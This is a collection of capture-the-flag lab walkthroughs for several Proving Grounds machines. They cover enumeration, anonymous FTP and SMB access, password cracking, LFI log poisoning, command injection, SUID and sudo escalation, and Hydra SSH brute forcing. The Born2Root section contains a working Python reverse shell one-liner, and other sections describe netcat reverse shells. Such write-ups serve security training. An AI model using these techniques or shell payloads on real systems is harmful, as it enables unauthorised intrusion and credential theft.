Category: Uncategorized
pg-funboxrookie-play
Exploitation Guide for FunboxRookie
Summary
This machine is exploited with an anonymous FTP server containing file id_rsa and then the disclosure of user credentials in a history file. It is escalated via open sudo that allows the user to run any command with elevated privileges.
Enumeration
Nmap
We start off by running an nmap
scan:
kali@kali:~$ sudo nmap 192.168.120.138
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 13:07 EDT
Nmap scan report for 192.168.120.138
Host is up (0.032s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
We can run a more detailed nmap
scan with the -sC
flag against the discovered ports:
kali@kali:~$ sudo nmap -p 21,22,80 192.168.120.138 -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 13:09 EDT
Nmap scan report for 192.168.120.138
Host is up (0.030s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 anna.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 ariel.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:52 bud.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:58 cathrine.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 homer.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 jessica.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 john.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 marge.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 miriam.zip
| -r--r--r-- 1 ftp ftp 1477 Jul 25 10:44 tom.zip
| -rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
|_-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 zlatan.zip
22/tcp open ssh
| ssh-hostkey:
| 2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
| 256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_ 256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open http
| http-robots.txt: 1 disallowed entry
|_/logs/
|_http-title: Apache2 Ubuntu Default Page: It works
The FTP server listening on the default port allows for anonymous logins, and we see several zip files listed.
Exploitation
Anonymous FTP Server
Of the files shown in the scan, only file tom.zip will prove useful to us. Next, we can log in and retrieve it:
kali@kali:~$ ftp 192.168.120.138
Connected to 192.168.120.138.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.120.138]
Name (192.168.120.138:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.118.3 !
230-
230-The local time is: Wed Oct 14 17:11:13 2020
230-
230-This is an experimental FTP server. If you have any unusual problems,
230-please report them via e-mail to <root@funbox2>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get tom.zip
local: tom.zip remote: tom.zip
200 PORT command successful
150 Opening BINARY mode data connection for tom.zip (1477 bytes)
226 Transfer complete
1477 bytes received in 0.00 secs (28.1715 MB/s)
ftp> bye
221 Goodbye.
kali@kali:~$
However, if we try to open the archive, we will find that it is password-protected.
Password Bruteforce
We can use zip2john
to convert the encrypted archive to a hash file usable by john
:
kali@kali:~$ zip2john tom.zip > tom.hash
ver 2.0 efh 5455 efh 7875 tom.zip/id_rsa PKZIP Encr: 2b chk, TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6
kali@kali:~$
We can now use john
and the rockyou.txt wordlist to crack the password:
kali@kali:~$ john --wordlist=/usr/share/wordlists/rockyou.txt tom.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iubire (tom.zip/id_rsa)
1g 0:00:00:00 DONE (2020-10-14 13:17) 100.0g/s 409600p/s 409600c/s 409600C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:~$
The cracker succeeds and reveals that the password is iubire
. Using it, we can unlock the archive:
kali@kali:~$ unzip -P iubire tom.zip
Archive: tom.zip
inflating: id_rsa
kali@kali:~$
We have obtained a private SSH key file id_rsa.
SSH
Since we have obtained the private key from the archive tom.zip, we can assume that the user is named tom
. Next, we will set proper key file permissions and then SSH to the target:
kali@kali:~$ chmod 0600 id_rsa
kali@kali:~$
kali@kali:~$ ssh -o StrictHostKeyChecking=no -i id_rsa tom@192.168.120.138
...
tom@funbox2:~$ id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
tom@funbox2:~$
Escaping Restricted Shell
But, if try to change directory or any of the other restricted commands, we will find that our default shell upon login is rbash
, which we must first escape:
tom@funbox2:~$ pwd
/home/tom
tom@funbox2:~$ cd ..
-rbash: cd: restricted
tom@funbox2:~$
There are many ways to do so, and we will choose one of the easiest ones (exiting the current shell and then reconnecting with the flag -t "bash --noprofile"
):
tom@funbox2:~$ exit
logout
-rbash: /usr/bin/clear_console: restricted: cannot specify `/' in command names
Connection to 192.168.120.138 closed.
kali@kali:~$
kali@kali:~$ ssh -o StrictHostKeyChecking=no -i id_rsa tom@192.168.120.138 -t "bash --noprofile"
load pubkey "id_rsa": invalid format
tom@funbox2:~$ pwd
/home/tom
tom@funbox2:~$ cd ..
tom@funbox2:/home$
We are now able to traverse and enumerate the system further.
Escalation
User Password Recovery
Looking around the user’s home directory, we find a MySQL history file:
tom@funbox2:/home$ cd ~
tom@funbox2:~$ ls -la
...
-rw------- 1 tom tom 295 Jul 25 12:04 .mysql_history
...
tom@funbox2:~$
In this file, we see the history of several MySQL commands:
tom@funbox2:~$ cat .mysql_history
_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
select\040*\040from\040support
;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit
tom@funbox2:~$
The command insert\040into\040support\040(tom,\040xx11yy22!);
looks very interesting as it contains string xx11yy22!
that looks like a password.
Sudo Escalation
Trying the password for the user to enumerate sudo privileges works, and we see that user tom
is actually able to run any command with sudo, providing the password:
tom@funbox2:~$ sudo -l
[sudo] password for tom:
Matching Defaults entries for tom on funbox2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tom may run the following commands on funbox2:
(ALL : ALL) ALL
tom@funbox2:~$
We can easily use this to get a root shell:
tom@funbox2:~$ sudo su
root@funbox2:/home/tom# id
uid=0(root) gid=0(root) groups=0(root)
root@funbox2:/home/tom#
pg-dc5-play
DC5
Port 80 on the target machine take us to the following web page. Multiple sub pages include non-english text and after translating random paragraphs found this is mostly gibberish.
Clicking the home button takes us to the same page but we notice this time we are on /index.php. I then ran feroxbuster against the target site to identify more pages.
Checking out contact.php and it appears to be the only page to take some form of input.
After submitting some test information we are directed to /thankyou.php where the URL contains our input from the previous page.
At this point I decided to test thankyou.php? for command injection. I caught the request in Burpsuite
and sent it to intruder. I then set the payload variable as below.
I then added the command injection list as shown below as the payload.
Ensure URL encoding is turned off as this was causing incorrect results as it was encoding '?'
.
Viewing the results of the payload after show that the ?file=
parameter appears to be vulnerable due to the content length being greatly different form the other values.
Viewing this in the browser shows us valid results.
We can fuzz for further files using wfuzz
and the command below:
The LFI list can be downloaded from here
We have two interesting LFI paths found once wfuzz
completes:
Checking out access.log we can see requests we have made.
We can capture a request in Burpsuite
and inject a PHP reverse shell into the User-Agent field. When the code is injected into the log we are able to get a reverse shell.
Where the code snippet below is used for the RCE:
With a netcat listener listening we can then access the log files again at: http://192.168.211.26/thankyou.php?file=../../../../../../../var/log/nginx/access.log
When we attempt to load the log files the page should hang and we get a reverse shell.
Searching for SUID commands on the machine find the binary screen-4.5.0 has the SUID bit set.
Researching on Google shows a local privilege escalation exploit for this binary version.
We first need to create some files and break down the script to get this to work. Follow the instructions below to achieve shell.
Compile libhax.c
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
Compile rootshell.c
gcc -o /tmp/rootshell /tmp/rootshell.c
Create exploit bash script.
Upload compiled files to target machine.
Once uploaded make the bash script executable:
Execute exploit.sh then after run /tmp/rootshell
to gain shell as root.
pg-dawn-play
Dawn
On port 445 we are able to list shares without credentials. We see the share ITDEPT is open to us.
kali@kali:~/dawn$ smbclient -U ” -L \\\\192.168.55.11\\
Enter WORKGROUP\’s password:
Sharename Type Comment
——— —- ——-
print$ Disk Printer Drivers
ITDEPT Disk PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
SMB1 disabled — no workgroup available
kali@kali:~/dawn$
kali@kali:~/dawn$ smbclient -U ” \\\\192.168.55.11\\ITDEPT
Enter WORKGROUP\’s password:
Try “help” to get a list of possible commands.
smb: \> ls
. D 0 Fri Aug 2 23:23:20 2019
.. D 0 Wed Jul 22 13:19:41 2020
7158264 blocks of size 1024. 3518364 blocks available
smb: \>
curl
to test for file upload on the share and confirmed was able to upload a PHP reverse shell which might come in handy for later.Enter host password for user ”:
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5496 0 0 100 5496 0 536k –:–:– –:–:– –:–:– 596k
kali@kali:~/dawn$
dirsearch.py
on port 80 reveals two interesting directories.Moving into logs shows the a list of logs where management.log is the only one we have permission to access
When reading the log file we have the lines below appearing frequently.
Knowing that we have write access to the ITDEPT share we can upload a reverse shell call it web-control and in theory this should execute.
Firstly I created a file called web-control and inserted a netcat
reverse shell into it
This was then uploaded to the SMB share.
smb: \> put web-control putting file web-control as \web-control (81.0 kb/s) (average 30.2 kb/s) smb: \> ls . D 0 Thu Sep 2 09:34:20 2021 .. D 0 Wed Jul 22 13:19:41 2020 rev.php A 5496 Thu Sep 2 09:13:41 2021 web-control A 83 Thu Sep 2 09:38:54 2021 7158264 blocks of size 1024. 3518292 blocks available smb: \>
After doing so I soon receive a shell back on my netcat
listener.
kali@kali:~/dawn$ nc -nlvp 9001 listening on [any] 9001 ... connect to [192.168.55.200] from (UNKNOWN) [192.168.55.11] 34450 /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ python -c 'import pty; pty.spawn("/bin/bash")'
zsh
as having the SUID bit set.www-data@dawn:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
www-data@dawn:~$
zsh
is a shell binary all we need to do is execute the full path of zsh
to gain a root shell.www-data@dawn:~$ /usr/bin/zsh /usr/bin/zsh dawn# id id uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data) dawn# cd /root cd /root dawn# ls ls flag.txt proof.txt dawn# cat flag.txt cat flag.txt Your flag is in another file... dawn# cat proof.txt cat proof.txt 04bf91ebc2de37fbee66338c45a80b95 dawn#
pg-covfefe-play
Covfefe
I started off with port 80 and was unable to identify any directories or files. The default page for the port goes to installation for nginix.
When attempting to browse to port 31337 we are given a 404 not found error. I then ran dirsearch.py
against the port using the command below which discovered what appeared to be a users home directory contents.
Checking out the /.ssh directory appears to list sub folder contents.
I first downloaded the id_rsa and then authorized_keys.
Viewing the contents of authorized_keys shows the user simon having a key in the file. First use chmod
on the id_rsa to set the correct permissions.
When attempting to use the key to connect by SSH we are prompted to provide a passphrase.
Using ssh2john we can convert the key to a hash which can be sent to John for cracking.
Now that we have the password starwars
for for the key we can try signing in again.
I then transferred over linpeas
and executed. Linpeas then identified the binary /usr/local/bin/read_message
as having the SUID bit set.
Running the binary and entering the name ‘Simon’ produces the following output:
As per the message we can read the source code. Listing the contents of the root directory shows the source code file.
It looks like as per the script it will read the first 5 characters to validate if correct but, has a total buffer for 20. We can try to overflow the buffer to execute a command.
Running the following when prompted to do so by the binary will give us a root shell.
pg-bossplayersctf-play
BossPlayersCTF
Port 80 shows the following page.
Viewing the source code of this page reveals text at the end.
We can take this string and run it through base64. We need to perform this three times to reveal a plain text string.
Browsing to workingprogress.php:
Looking at the comment regarding ping we can take a guess for command injection on the current page. Appending ?cmd=(command) generates results.
To create a reverse shell run the following command in a terminal:
Then take the base64 output and run it as a command in the web browser.
This will create a reverse shell connection on our netcat
listener.
I then transferred linpeas
over from my attacking machine. Shortly after running linpeas finds that the binary ‘find’ has the SUID bit set.
Checking this against GTFOBins shows we can use this to gain a root shell.
Run the following command to spawn a root shell:
pg-born2root-play
Exploitation Guide for Born2Root
Summary
Born2Root is an intermediate machine that requires good enumeration and a basic understanding of Linux cronjobs.
Enumeration
Nmap
We initiate our enumeration of the target by launching two nmap
scans. The first one will identify open ports, and the second one will attempt to discover more information about each service.
kali@kali:~$ sudo nmap 192.168.54.49
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 11:53 SAST
Nmap scan report for 192.168.54.49
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
kali@kali:~$ sudo nmap -p 22,80,111 -A 192.168.54.49
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 11:53 SAST
Nmap scan report for 192.168.54.49
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
| 2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
| 256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_ 256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 2 disallowed entries
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Secretsec Company
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39832/tcp6 status
| 100024 1 47504/udp status
| 100024 1 50443/udp6 status
|_ 100024 1 52205/tcp status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have a web server running on port 80 and when browsing to the website, we find a company web page with general and contact related information.
We should take note of the username martin
that appears twice on this page: in the About Us section and in the Contact Us section.
GoBuster
We will use GoBuster
to do a brute force scan in an attempt to discover any other folders present on the web server using the common.txt wordlist.
kali@kali:~$ locate common.txt
...
/usr/lib/python3/dist-packages/mercurial/helptext/common.txt
/usr/share/dirb/wordlists/common.txt
...
kali@kali:~$ gobuster dir -t 20 -w /usr/share/dirb/wordlists/common.txt --url http://192.168.54.49
...
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/files (Status: 301)
/icons (Status: 301)
/index.html (Status: 200)
/manual (Status: 301)
/robots.txt (Status: 200)
/server-status (Status: 403)
...
Gobuster finds a directory named /icons containing a text file VDSoyuAXiO.txt. This file contains an SSH Key. We will download the key and save it to a file.
kali@kali:~$ curl http://192.168.54.49/icons/VDSoyuAXiO.txt >> born
kali@kali:~$ cat born
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoNgGGOyEpn/txphuS2pDA1i2nvRxn6s8DO58QcSsY+/Nm6wC
...
2o1pyGm7j7wfhIZNBP/wwJSC2/NLV6rQeH7Zj8nFv69RcRX56LrQZjFAWWsa/C43
rlJ7dOFH7OFQbGp51ub88M1VOiXR6/fU8OMOkXfi1KkETj/xp6t+
-----END RSA PRIVATE KEY-----
Exploitation
Local SSH Access
Let’s give this key proper permissions and then use it to SSH as martin
(we can just hit enter when prompted for secret password
).
kali@kali:~$ chmod 0600 born
kali@kali:~$ ssh martin@192.168.120.52 -i born
...
READY TO ACCESS THE SECRET LAB ?
secret password :
WELCOME !
martin@debian:~$ id
uid=1001(martin) gid=1001(martin) groups=1001(martin)
Escalation
Local Enumeration
Checking all the cronjobs scheduled on the system, we find a python file that is readable, and the cronjob is scheduled for a user named Jimmy
.
martin@debian:~$ cat /etc/cron*
...
*/5 * * * * jimmy python /tmp/sekurity.py
Reverse Shell
We can copy a Python reverse shell into the sekurity.py file chmod+x sekurity.py and wait 5 minutes for the cronjob to be executed.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.63.200",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
We need to set up a netcat listener on our Kali machine to catch the reverse shell that is going to get executed on the target system.
After a few minutes, we catch our shell:
kali@kali:~$ sudo nc -lvp 80
listening on [any] 80 ...
192.168.54.49: inverse host lookup failed: Unknown host
connect to [192.168.49.54] from (UNKNOWN) [192.168.54.49] 52400
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(jimmy) gid=1002(jimmy) groups=1002(jimmy)
$ python -c 'import pty; pty.spawn("/bin/bash")'
jimmy@debian:~$
SSH Login Brute-Force
Let’s check /etc/passwd to get a list of available users on the system:
jimmy@debian:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
--snip--
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
martin:x:1001:1001:,,,:/home/martin:/bin/bash
jimmy:x:1002:1002:,,,:/home/jimmy:/bin/bash
The user Hadi
stands out as another user also mentioned on the company website.
kali@kali:~$
cat /usr/share/wordlists/rockyou.txt | grep hadi > /home/kali/hadi.txt
I then used the text file with Hydra to bruteforce SSH which actually worked.
Now we can try brute-forcing the password for the user hadi
using Hydra
:
kali@kali:~$ hydra -t 4 -l hadi.txt -P passwords-mutated.txt 192.168.120.52 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-06 09:39:44
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1161 login tries (l:1/p:1161), ~291 tries per task
[DATA] attacking ssh://192.168.120.52:22/
[STATUS] 24.00 tries/min, 24 tries in 00:01h, 1137 to do in 00:48h, 4 active
[STATUS] 26.33 tries/min, 79 tries in 00:03h, 1082 to do in 00:42h, 4 active
[STATUS] 23.43 tries/min, 164 tries in 00:07h, 997 to do in 00:43h, 4 active
[STATUS] 23.67 tries/min, 284 tries in 00:12h, 877 to do in 00:38h, 4 active
[22][ssh] host: 192.168.120.52 login: hadi password: hadi123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-06 09:52:26
We find that the password is hadi123
, and now we simply switch from our current user to hadi
with the recovered password:
jimmy@debian:~$ su hadi
...
hadi@debian:/home/jimmy$ id
id
uid=1000(hadi) gid=1000(hadi) groups=1000(hadi),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
Escalation to Root
The password for root
was re-used and is the same as hadi
‘s: hadi123
.
hadi@debian:~$ su -
Password:
root@debian:~# whoami
root
explained
root@debian:/var/spool/cron# cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) */5 * * * * jimmy python /tmp/sekurity.py root@debian:/var/spool/cron#
THE RABBIT HOLE
The networker
binary is a lie. There isn’t anything in it that is helpful. It doesn’t take any input, it doesn’t open any ports, and the paths are all hard-coded. I’m sure there’s a way to edit the binary to add our own custom shell code to it, but I don’t have my OSCE yet and this is supposed to be an intermediate difficulty VM, so I’m not about go try and deal with that.
Instead, I’m going to go back to my OSCP training
kali@kali:~$ sudo nc -nlvp 80
Password:
listening on [any] 80 ...
connect to [192.168.63.200] from (UNKNOWN) [192.168.63.49] 53601
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(jimmy) gid=1002(jimmy) groups=1002(jimmy)
$ ls -la
total 28
drwx------ 2 jimmy jimmy 4096 Jun 9 2017 .
drwxr-xr-x 5 root root 4096 Jun 9 2017 ..
-rw-r--r-- 1 root root 0 Mar 6 2020 .bash_history
-rw-r--r-- 1 jimmy jimmy 220 Jun 8 2017 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3515 Jun 8 2017 .bashrc
-rw-r--r-- 1 jimmy jimmy 675 Jun 8 2017 .profile
-rwsrwxrwx 1 root root 7496 Jun 9 2017 networker
$ file networker
networker: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=bacc02fa5747f07430f55e0d5e70d4078800c9f5, not stripped
$ strings networker
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
puts
printf
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.1.3
GLIBC_2.0
UWVS
t$,U
[^_]
*** Networker 2.0 ***
/sbin/ifconfig
/bin/ping -c 1 localhost
Done
echo 'echo linux tool version 5'
;*2$"
GCC: (Debian 6.3.0-12) 6.3.0 20170406
crtstuff.c
__JCR_LIST__
--snip--
.dynamic
.got.plt
.data
.bss
.comment
$
.
Protected: pg-btrsys2.1-play
pg-bbscute-play
BBSCute
Navigating to port 80 in the browser lands us on the default install page for Apache.
Running dirsearch.py
against the target web servers reveals index.php
Index.php takes us to the login page for CuteNews. I tried some default credentials and was unable to access the system.
Instead we can register ourselves as a new user to access. On the register new user page we are not able to load the captcha which stops us from proceeding:
Reviewing the source of this page shows we do have a link for captcha.php.
Viewing this will show what the current captcha should be.
Entering this into the registration field will allow us to proceed with new user creation.
We can see that we are running CuteNews 2.1.2 as per the footer of the page. Searching for exploits with searchsploit
shows the results below.
Searching further on Google for exploits we come across a PoC on GitHub located here: https://github.com/CRFSlick/CVE-2019-11447-POC.
Download the python script and the sad.gif
files to the same directory. Run with the syntax shown below.
We can now run the following command to get a more usable reverse shell on a different listener:
From here I uploaded linpeas
which after executing identified the binary hping3 as having a SUID bit set. Meaning we can execute the binary with root permissions.
Then as per GTFOBins we can executed with the SUID bit to gain a root shell.
pg-wpwn-play
Wpwn
Running curl
on port 80 simply shows a basic greeting for the machine by the creator.
With nothing else interesting we move onto directory enumeration with dirsearch.py
.
With the common.txt wordlists we hit robots.txt and /wordpress. Robots contains no interesting information.
Moving over to the /wordpress directory we get the following page.
Other than this the WordPress site contains no interesting information. From here we can run WPScan
in order to try and identify further information.
WPScan
picks up the plugin ‘social-warfare’ as being installed and out of date.
Checking this against searchsploit
reveals a RCE against the running version.
The vulnerability has been assigned CVE-2019-9978.
Description:
The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.
The following GitHub shows a PoC for this exploit.
As per the GitHub description we need to create a text file that will be hosted on our attacking machine with the contents of what we want to execute.
First I hosted a Python SimpleHTTPServer
on my attacking machine.
I then downloaded the associated Python script and executed as per below.
In the example above the command included for test.txt was 'id'
. From here I replaced the command with 'which nc'
to see if netcat
is on the target machine and then run the exploit again.
As netcat
is installed we can replace the command in the test.txt file with that of a netcat
reverse shell.
Contents of test.txt:
I then set a netcat
listener on my attacking machine:
Running the exploit again hangs the script as we receive a reverse shell.
We then upgrade the shell:
Moving back one directory in the shell we can then read the contents of wp-config for any MySQL
database credentials.
We have gathered the credentials: wp_user:R3&]vzhHmMn9,:-5
From here I logged into MySQL
and took the WordPress administrator’s hash. I was however, unable to crack. Looking on the box we have the user ‘takis’ I decided to see if password reuse was in play and SSH
in as takis.
Now we are in as takis I then run sudo -l
to check sudo
permissions.
Looks like we can run all commands as any users without a password. A simple sudo /bin/bash
will spawn us a root shell.